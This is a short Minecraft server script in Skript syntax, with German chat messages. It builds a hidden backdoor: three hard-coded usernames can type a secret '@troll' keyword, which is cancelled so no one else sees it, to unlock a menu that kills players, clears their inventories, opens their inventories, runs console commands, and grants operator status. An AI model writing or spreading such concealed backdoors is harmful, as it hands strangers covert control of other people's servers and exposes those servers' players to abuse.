on Chat: if player is "firebreakHD" or "xtrishur" or "SPY_M_TraqezYT": if message contains "@troll": Cancel Event if {troll.%player%} is not set: wait 1 tick send message "{@p} &7Der &cTroll modus &7ist jetzt &aaktiviert" send message "{@p} &7Zum &cdeaktivieren &7bitte rejoinen!" set {troll.%player%} to true stop wait 1 tick send message "{@p} &7Der &cTroll modus &7ist jetzt &aaktiviert" send message "{@p} &7Zum &cdeaktivieren &7bitte rejoinen!" set {troll.%player%} to true On rightclick on a player: if {troll.%player%} is true: open chest with 1 row named "&d%clicked player%" to player wait 1 tick play "CHEST_OPEN" to player at volume 50 format slot 0 of player with apple named "&cKill the Player" to run [kill clicked player] format slot 1 of player with blue dye named "&aArmor!" to run [execute console command "armor %clicked player%"] format slot 2 of player with bow named "&bClear" to run [execute console command "clear %clicked player%"] format slot 3 of player with arrow named "&aInvSee" to run [open the clicked player's inventory for the player] format slot 4 of player with golden apple named "&6OP Player" to run [op clicked player] Command armor []: trigger: set helmet of arg 1 to diamond helmet set chestplate of arg 1 to diamond chestplate set leggings of arg 1 to diamond leggings set boots of arg 1 to diamond boots